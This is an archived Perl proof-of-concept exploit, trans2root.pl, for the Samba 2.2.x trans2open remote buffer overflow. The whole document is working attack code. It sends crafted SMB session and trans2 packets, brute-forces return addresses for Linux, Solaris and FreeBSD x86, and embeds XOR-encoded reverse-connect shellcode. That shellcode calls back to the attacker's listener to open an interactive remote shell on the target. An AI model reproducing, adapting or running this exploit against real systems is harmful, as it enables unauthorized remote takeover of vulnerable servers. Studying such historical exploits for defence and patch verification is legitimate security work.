Samba 2.2.x - Remote Buffer Overflow - 2003-0201

1. #!/usr/bin/perl
2. ###############
3.  
4. ##[ Header
5. #         Name:  trans2root.pl
6. #      Purpose:  Proof of concept exploit for Samba 2.2.x (trans2open overflow)
7. #       Author:  H D Moore <hdmoore@digitaldefense.net>
8. #    Copyright:  Copyright (C) 2003 Digital Defense Inc.
9. #  trans2root.pl <options> -t <target type> -H <your ip> -h <target ip>
10. ##
11.  
12. use strict;
13. use Socket;
14. use IO::Socket;
15. use IO::Select;
16. use POSIX;
17. use Getopt::Std;
18.  
19. $SIG{USR2} = \&GoAway;
20.  
21. my %args;
22. my %targets =
23. (
24.     "linx86"  => [0xbffff3ff, 0xbfffffff, 0xbf000000, 512, \&CreateBuffer_linx86],
25.     "solx86"  => [0x08047404, 0x08047ffc, 0x08010101, 512, \&CreateBuffer_solx86],
26.     "fbsdx86" => [0xbfbfefff, 0xbfbfffff, 0xbf000000, 512, \&CreateBuffer_bsdx86],
27.     # name      # default   # start     # end      # step  # function
28. );
29.  
30. getopt('t:M:h:p:r:H:P:', \%args);
31.  
32. my $target_type = $args{t} || Usage();
33. my $target_host = $args{h} || Usage();
34. my $local_host  = $args{H} || Usage();
35. my $local_port  = $args{P} || 1981;
36. my $target_port = $args{p} || 139;
37.  
38. my $target_mode = "brute";
39.  
40. if (! exists($targets{$target_type})) { Usage(); }
41. print "[*] Using target type: $target_type\n";
42.  
43. # allow single mode via the -M option
44. if ($args{M} && uc($args{M}) eq "S")
45. {
46.     $target_mode = "single";
47. }
48.  
49. # the parent process listens for an incoming connection
50. # the child process handles the actual exploitation
51. my $listen_pid = $$;
52. my $exploit_pid = StartListener($local_port);
53.  
54. # get the default return address for single mode
55. my $targ_ret = $args{r} || $targets{$target_type}->[0];
56. my $curr_ret;
57. $targ_ret = eval($targ_ret);
58.  
59. if ($target_mode !~ /brute|single/)
60. {
61.     print "[*] Invalid attack mode: $target_mode (single or brute only)\n";
62.     exit(0);
63. }
64.  
65.  
66. if ($target_mode eq "single")
67. {
68.     $curr_ret = $targ_ret;
69.     if(! $targ_ret)
70.     {
71.        print "[*] Invalid return address specified!\n";
72.         kill("USR2", $listen_pid);
73.         exit(0);
74.     }
75.  
76.     print "[*] Starting single shot mode...\n";
77.     printf ("[*] Using return address of 0x%.8x\n", $targ_ret);
78.     my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $targ_ret);
79.     my $ret = AttemptExploit($target_host, $target_port, $buf);
80.  
81.     sleep(2);
82.     kill("USR2", $listen_pid);
83.     exit(0);
84. }
85.  
86.  
87. if ($target_mode eq "brute")
88. {
89.     print "[*] Starting brute force mode...\n";
90.  
91.     for (
92.           $curr_ret  =$targets{$target_type}->[1];
93.           $curr_ret >= $targets{$target_type}->[2];
94.           $curr_ret -=$targets{$target_type}->[3]
95.         )
96.     {
97.         select(STDOUT); $|++;
98.         my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $curr_ret);
99.         printf ("                                        \r[*] Return Address: 0x%.8x", $curr_ret);
100.         my $ret = AttemptExploit($target_host, $target_port, $buf);
101.     }
102.     sleep(2);
103.     kill("USR2", $listen_pid);
104.     exit(0);
105. }
106.  
107. sub Usage {
108.  
109.     print STDERR "\n";
110.     print STDERR " trans2root.pl - Samba 2.2.x 'trans2open()' Remote Exploit\n";
111.     print STDERR "===================================\n\n";
112.     print STDERR "    Usage: \n";
113.     print STDERR "           $0 <options> -t <target type> -H <your ip> -h <target ip>\n";
114.     print STDERR "  Options:  \n";
115.     print STDERR "           -M (S|B) <single or brute mode>\n";
116.     print STDERR "           -r       <return address for single mode>\n";
117.     print STDERR "           -p       <alternate Samba port>\n";
118.     print STDERR "           -P       <alternate listener port>\n";
119.     print STDERR "  Targets:\n";
120.     foreach my $type (keys(%targets))
121.     {
122.         print STDERR "            $type\n";
123.     }
124.     print STDERR "\n";
125.  
126.  
127.     exit(1);
128. }
129.  
130.  
131. sub StartListener {
132.     my ($local_port) = @_;
133.     my $listen_pid = $$;
134.  
135.     my $s = IO::Socket::INET->new (
136.                 Proto => "tcp",
137.                 LocalPort => $local_port,
138.                 Type => SOCK_STREAM,
139.                 Listen => 3,
140.                 ReuseAddr => 1
141.     );
142.  
143.     if (! $s)
144.     {
145.         print "[*] Could not start listener: $!\n";
146.         exit(0);
147.     }
148.  
149.     print "[*] Listener started on port $local_port\n";
150.  
151.     my $exploit_pid = fork();
152.     if ($exploit_pid)
153.     {
154.         my $victim;
155.         $SIG{USR2} = \&GoAway;
156.  
157.         while ($victim = $s->accept())
158.         {
159.             kill("USR2", $exploit_pid);
160.             print STDOUT "\n[*] Starting Shell " . $victim->peerhost . ":" . $victim->peerport . "\n\n";
161.             StartShell($victim);
162.         }
163.         exit(0);
164.     }
165.     return ($exploit_pid);
166. }
167.  
168. sub StartShell {
169.     my ($client) = @_;
170.     my $sel = IO::Select->new();
171.  
172.     Unblock(*STDIN);
173.     Unblock(*STDOUT);
174.     Unblock($client);
175.  
176.     select($client); $|++;
177.     select(STDIN);   $|++;
178.     select(STDOUT);  $|++;
179.  
180.     $sel->add($client);
181.     $sel->add(*STDIN);
182.  
183.     print $client "echo \\-\\-\\=\\[ Welcome to `hostname` \\(`id`\\)\n";
184.     print $client "echo \n";
185.  
186.     while (fileno($client))
187.     {
188.         my $fd;
189.         my @fds = $sel->can_read(0.2);
190.  
191.         foreach $fd (@fds)
192.         {
193.             my @in = <$fd>;
194.  
195.             if(! scalar(@in)) { next; }
196.  
197.             if (! $fd || ! $client)
198.             {
199.                 print "[*] Closing connection.\n";
200.                 close($client);
201.                 exit(0);
202.             }
203.  
204.             if ($fd eq $client)
205.             {
206.                 print STDOUT join("", @in);
207.             } else {
208.                 print $client join("", @in);
209.             }
210.         }
211.     }
212.     close ($client);
213. }
214.  
215. sub AttemptExploit {
216.     my ($Host, $Port, $Exploit) = @_;
217.     my $res;
218.  
219.     my $s = IO::Socket::INET->new(PeerAddr => $Host, PeerPort => $Port, Type
220.   => SOCK_STREAM, Protocol => "tcp");
221.  
222.     if (! $s)
223.     {
224.         print "\n[*] Error: could not connect: $!\n";
225.         kill("USR2", $listen_pid);
226.         exit(0);
227.     }
228.  
229.     select($s); $|++;
230.     select(STDOUT); $|++;
231.     Unblock($s);
232.  
233.     my $SetupSession =
234.         "\x00\x00\x00\x2e\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x08".
235.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
236.         "\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01".
237.         "\x00\x00\x00\x00";
238.  
239.     my $TreeConnect =
240.         "\x00\x00\x00\x3c\xff\x53\x4d\x42\x70\x00\x00\x00\x00\x00".
241.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00".
242.         "\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24".
243.         "\x25\x6e\x6f\x62\x6f\x64\x79\x00\x00\x00\x00\x00\x00\x00\x49\x50".
244.         "\x43\x24";
245.  
246.     my $Flush = ("\x00" x 808);
247.  
248.     print $s $SetupSession;
249.     $res = ReadResponse($s);
250.  
251.     print $s $TreeConnect;
252.     $res = ReadResponse($s);
253.  
254.     # uncomment this for diagnostics
255.     #print "[*] Press Enter to Continue...\n";
256.     #$res = <STDIN>;
257.  
258.     #print "[*] Sending Exploit Buffer...\n";
259.  
260.     print $s $Exploit;
261.     print $s $Flush;
262.  
263.     ReadResponse($s);
264.     close($s);
265. }
266.  
267. sub CreateBuffer_linx86 {
268.     my ($Host, $Port, $Return) = @_;
269.  
270.     my $RetAddr =  eval($Return);
271.     $RetAddr = pack("l", $RetAddr);
272.  
273.     my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
274.     $a1 = chr(ord($a1) ^ 0x93);
275.     $a2 = chr(ord($a2) ^ 0x93);
276.     $a3 = chr(ord($a3) ^ 0x93);
277.     $a4 = chr(ord($a4) ^ 0x93);
278.  
279.     my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
280.     $p1 = chr(ord($p1) ^ 0x93);
281.     $p2 = chr(ord($p2) ^ 0x93);
282.  
283.     my $exploit =
284.         # trigger the trans2open overflow
285.         "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
286.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
287.         "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
288.         "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
289.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
290.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".
291.  
292.         GetNops(772) .
293.  
294.         # xor decoder courtesy of hsj
295.         "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
296.         "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
297.         "\x93\x40\xe2\xfa".
298.  
299.         # reverse-connect, mangled lamagra code + fixes
300.         "\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b".
301.         "\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a".
302.         "\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d".
303.         $p1.$p2 ."\x54\xd6\x63". $a1.$a2.$a3.$a4.
304.         "\x1e\xd6\x7f\x1a\xd6\x6b\x55\xd6\x6f\x83\x1a\x43\xd0\x1e\xde\x67".
305.         "\x5e\x13\xa2\x5a\x03\x18\xce\x67\xa2\x53\xbe\x52\x6c\x6c\x6c\x5e".
306.         "\x13\xd2\xa2\x41\x12\x79\x6e\x6c\x6c\x6c\xaa\x42\xe6\x79\x78\x8b".
307.         "\xcd\x1a\xe6\x9b\xa2\x53\x1b\xd5\x94\x1a\xd6\x9f\x23\x98\x1a\x60".
308.         "\x1e\xde\x9b\x1e\xc6\x9f\x5e\x13\x7b\x70\x6c\x6c\x6c\xbc\xf1\xfa".
309.         "\xfd\xbc\xe0\xfb".
310.  
311.         GetNops(87).
312.  
313.         ($RetAddr x 8).
314.  
315.         "DDI!". ("\x00" x 277);
316.  
317.     return $exploit;
318. }
319.  
320. sub CreateBuffer_solx86 {
321.     my ($Host, $Port, $Return) = @_;
322.  
323.     my $RetAddr =  eval($Return);
324.     my $IckAddr = $RetAddr - 512;
325.  
326.     $RetAddr = pack("l", $RetAddr);
327.     $IckAddr = pack("l", $IckAddr);
328.  
329.     # IckAddr needs to point to a writable piece of memory
330.  
331.     my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
332.     $a1 = chr(ord($a1) ^ 0x93);
333.     $a2 = chr(ord($a2) ^ 0x93);
334.     $a3 = chr(ord($a3) ^ 0x93);
335.     $a4 = chr(ord($a4) ^ 0x93);
336.  
337.     my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
338.     $p1 = chr(ord($p1) ^ 0x93);
339.     $p2 = chr(ord($p2) ^ 0x93);
340.  
341.     my $exploit =
342.         # trigger the trans2open overflow
343.         "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
344.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
345.         "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
346.         "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
347.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
348.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".
349.  
350.         GetNops(813) .
351.  
352.         # xor decoder courtesy of hsj
353.         "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
354.         "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
355.         "\x93\x40\xe2\xfa".
356.  
357.         # reverse-connect, code by bighawk
358.         "\x2b\x6c\x6b\x6c\xaf\x64\x43\xc3\xa2\x53\x23\x09\xc3\x1a\x76\xa2".
359.         "\x5a\xc2\xd2\xd2\xc2\xc2\x23\x75\x6c\x46\xa2\x41\x1a\x54\xfb".
360.         $a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2.
361.         "\xf5\xc2\x1a\x75\xf9\x83\xc5\xc4\x23\x78\x6c\x46\xa2\x41\x21\x9a".
362.         "\xc2\xc1\xc4\x23\xad\x6c\x46\xda\xea\x61\xc3\xfb\xbc\xbc\xe0\xfb".
363.         "\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc3\xc0\x1a\x71\xc3\xc1\xc0\x23\xa8".
364.         "\x6c\x46".
365.  
366.         GetNops(87) .
367.  
368.         "010101".
369.         $RetAddr.
370.         $IckAddr.
371.         $RetAddr.
372.         $IckAddr.
373.         "101010".
374.  
375.         "DDI!". ("\x00" x 277);
376.  
377.     return $exploit;
378. }
379.  
380. sub CreateBuffer_bsdx86 {
381.     my ($Host, $Port, $Return) = @_;
382.  
383.     my $RetAddr =  eval($Return);
384.     my $IckAddr = $RetAddr - 512;
385.  
386.     $RetAddr = pack("l", $RetAddr);
387.     $IckAddr = pack("l", $IckAddr);
388.  
389.     # IckAddr needs to point to a writable piece of memory
390.  
391.     my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host));
392.     $a1 = chr(ord($a1) ^ 0x93);
393.     $a2 = chr(ord($a2) ^ 0x93);
394.     $a3 = chr(ord($a3) ^ 0x93);
395.     $a4 = chr(ord($a4) ^ 0x93);
396.  
397.     my ($p1, $p2) = split(//, reverse(pack("s", $Port)));
398.     $p1 = chr(ord($p1) ^ 0x93);
399.     $p2 = chr(ord($p2) ^ 0x93);
400.  
401.     my $exploit =
402.         # trigger the trans2open overflow
403.         "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00".
404.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
405.         "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00".
406.         "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01".
407.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
408.         "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90".
409.  
410.         GetNops(830) .
411.  
412.         # xor decoder courtesy of hsj
413.         "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01".
414.         "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30".
415.         "\x93\x40\xe2\xfa".
416.  
417.         # reverse-connect, code by bighawk
418.         "\xa2\x5a\x64\x72\xc2\xd2\xc2\xd2\xc2\xc2\x23\xf2\x5e\x13\x1a\x50".
419.         "\xfb". $a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2.
420.         "\xf5\xc2\x1a\x75\x21\x83\xc1\xc5\xc3\xc3\x23\xf1\x5e\x13\xd2\x23".
421.         "\xc9\xda\xc2\xc0\xc0\x5e\x13\xd2\x71\x66\xc2\xfb\xbc\xbc\xe0\xfb".
422.         "\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc2\xc7\xc0\xc0\x23\xa8\x5e\x13".
423.  
424.         GetNops(87) .
425.  
426.         "010101".
427.         $RetAddr.
428.         $IckAddr.
429.         $RetAddr.
430.         $IckAddr.
431.         "101010".
432.  
433.         "DDI!". ("\x00" x 277);
434.  
435.     return $exploit;
436. }
437.  
438. sub Unblock {
439.         my $fd = shift;
440.         my $flags;
441.         $flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n";
442.         fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n";
443. }
444.  
445. sub GoAway {
446.     exit(0);
447. }
448.  
449. sub ReadResponse {
450.     my ($s) = @_;
451.     my $sel = IO::Select->new($s);
452.     my $res;
453.     my @fds = $sel->can_read(4);
454.     foreach (@fds) { $res .= <$s>; }
455.     return $res;
456. }
457.  
458. sub HexDump {
459.     my ($data) = @_;
460.     my @x = split(//, $data);
461.     my $cnt = 0;
462.  
463.     foreach my $h (@x)
464.     {
465.         if ($cnt > 16)
466.         {
467.             print "\n";
468.             $cnt = 0;
469.         }
470.  
471.         printf("\\x%.2x", ord($h));
472.         $cnt++;
473.     }
474.     print "\n";
475. }
476.  
477. # thank you k2 ;)
478. sub GetNops {
479.     my ($cnt) = @_;
480.     my @nops = split(//,"\x99\x96\x97\x95\x93\x91\x90\x4d\x48\x47\x4f\x40\x41\x37\x3f\x97".
481.                         "\x46\x4e\xf8\x92\xfc\x98\x27\x2f\x9f\xf9\x4a\x44\x42\x43\x49\x4b".
482.                         "\xf5\x45\x4c");
483.     return join ("", @nops[ map { rand @nops } ( 1 .. $cnt )]);
484. }
485.  
486.  
487.  
488. # milw0rm.com [2003-04-07]
489.